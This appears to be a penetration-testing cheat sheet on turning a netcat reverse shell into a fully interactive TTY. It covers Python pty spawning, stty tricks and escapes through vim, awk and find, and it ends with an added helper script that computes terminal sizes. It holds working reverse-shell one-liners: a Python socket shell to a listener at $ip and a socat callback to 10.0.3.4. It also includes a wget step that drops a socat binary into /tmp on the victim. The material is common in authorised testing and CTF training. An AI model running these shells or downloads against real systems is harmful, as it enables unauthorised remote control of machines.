Upgrading shell
Netcat is a great tool, but it also has its shortcomings:
Hitting "Ctrl-C", for instance, drops the entire shell instead of cancelling the current command as on a regular terminal shell;
You cannot run interactive commands like su to log into other local accounts or SSH to connect to other hosts;
Text editors like Vim and Nano cannot be used properly to edit files (only non-interactively);
Features like job control, tab completion and command history with the up-arrow are also missing.
To overcome these problems we need to switch to an interactive TTY (i.e. pseudo-terminal) shell and then make the local terminal settings match it.
Different PTY modules
Python pty module
python -c 'import pty; pty.spawn("/bin/sh")'
python3 -c 'import pty; pty.spawn("/bin/sh")'
python3 -c 'import pty; pty.spawn("/bin/bash")'
Python reverse shell (replace $ip with the listener address; it gives a plain /bin/sh -i, so upgrade it with one of the pty.spawn one-liners above once connected):
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("$ip",1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Perl
perl -e 'exec "/bin/sh";'
(Note: this only replaces the Perl process with a shell; it does not allocate a PTY by itself, so combine it with socat or the stty steps below.)
Using socat
On Kali (listen):
socat file:`tty`,raw,echo=0 tcp-listen:4444
On Victim (launch):
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444
If socat is not installed on the victim, download a static binary and use it instead:
wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444
Other ways (each is typed into the shell or interpreter you already have):
From a shell: /bin/sh -i
From a Python prompt: import os; os.system('/bin/bash')
From Perl: exec "/bin/sh";
Related Shell Escape Sequences
Vi / Vim
:!bash
:set shell=/bin/bash
:shell
awk
awk 'BEGIN {system("/bin/bash")}'
find
find / -exec /usr/bin/awk 'BEGIN {system("/bin/bash")}' \;
Netcat Magic
1. First spawn a PTY shell with python (or one of the other methods above):
python -c 'import pty; pty.spawn("/bin/bash")'
2. Background the process with Ctrl-Z

3. Examine the current terminal and STTY info so we can force the connected shell to match it:
stty -a | head -n1 | cut -d ';' -f 2-3 | cut -b2- | sed 's/; /\n/'
The information needed is the size of the current TTY (“Example: rows 38; columns 116”)
4. With the shell still backgrounded, set the local terminal to raw mode and turn off local echo with the following command (raw mode passes keystrokes such as Ctrl-C straight through to the remote shell instead of the local one):
stty raw -echo
With a raw stty, input/output will look weird and you won’t see the next commands, but as you type they are being processed.
5. Next, foreground the shell with fg. It will re-open the reverse shell but the formatting will be off. Finally, reinitialize the terminal with reset.
6. After the reset the shell should look normal again. The last step is to set the shell, terminal type and stty size to match our current Kali window (from the info gathered above):
$ export SHELL=bash
$ export TERM=xterm-256color
$ stty rows 38 columns 116

The end result is a fully interactive TTY with all the features we’d expect (tab-complete, history, job control, etc) all over a netcat connection :)
Obtaining a full interactive shell with zsh
Current Kali releases ship zsh as the default shell, and the method above does not work there when stty raw -echo and fg are entered as separate commands, so the variant below enters them on one line.
1. Get a TTY shell with the commands above and then background the process with Ctrl-Z
2. Get the number of rows and columns with:
stty -a | head -n1 | cut -d ';' -f 2-3 | cut -b2- | sed 's/; /\n/'
3. To ignore hotkeys in the local shell and return to your reverse shell, enter
stty raw -echo; fg
# Note: For zsh users it is important to enter this in one line!
4. Configure your rows and columns
stty rows <ROWS> cols <COLS>
5. Export the terminal type
export TERM=xterm-256color
6. All you need to do now, is reload your shell:
exec /bin/bash
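The size step in both procedures above (the netcat one and the zsh one) is the same: read rows and columns from the first line of stty -a on the attacker side and retype them on the victim side. The script below is an added example, not part of the original page, that derives the victim-side commands from that line so they can be pasted after stty raw -echo; fg and reset. The export values (SHELL=bash, TERM=xterm-256color) are the ones the page uses; support for the BSD/macOS stty layout ("24 rows; 80 columns;") is an assumption beyond the Linux format shown on the page.

```shell
#!/bin/sh
# Added example (not from the original page): turn the attacker terminal's
# `stty -a` first line into the commands to paste into the upgraded shell.

# Extract one numeric field (rows or columns) from the first line of `stty -a`.
# Handles the GNU layout ("rows 38; columns 116;") and, as an assumption, the
# BSD layout ("38 rows; 116 columns;").
stty_field() {
    # $1: field name (rows|columns), $2: the stty line
    printf '%s\n' "$2" | sed -n \
        -e "s/.*$1 \([0-9][0-9]*\).*/\1/p" \
        -e "s/.*[; ]\([0-9][0-9]*\) $1.*/\1/p" | head -n 1
}

# Print the `stty rows N columns M` command for the victim, or fail when the
# line carries no size (for example when stdin is not a terminal).
tty_size_cmd() {
    rows=$(stty_field rows "$1")
    cols=$(stty_field columns "$1")
    [ -n "$rows" ] && [ -n "$cols" ] || return 1
    printf 'stty rows %s columns %s\n' "$rows" "$cols"
}

# Emit everything to paste after `stty raw -echo; fg` and `reset`:
# terminal size, SHELL, TERM, then reload the shell into bash.
victim_commands() {
    size=$(tty_size_cmd "$1") || return 1
    printf '%s\n' "$size" 'export SHELL=bash' 'export TERM=xterm-256color' 'exec /bin/bash'
}

# Use the real local terminal when one is attached; otherwise fall back to a
# constructed sample line so the script still shows its output.
if [ -t 0 ]; then
    line=$(stty -a | head -n 1)
else
    line='speed 38400 baud; rows 38; columns 116; line = 0;'   # constructed sample
fi
victim_commands "$line" || echo "could not determine terminal size from: $line" >&2
```

Run it in the attacker terminal and paste its four output lines into the reverse shell; when run without a terminal (a pipe or a CI job) it falls back to the constructed sample line and prints the commands for a 38x116 window.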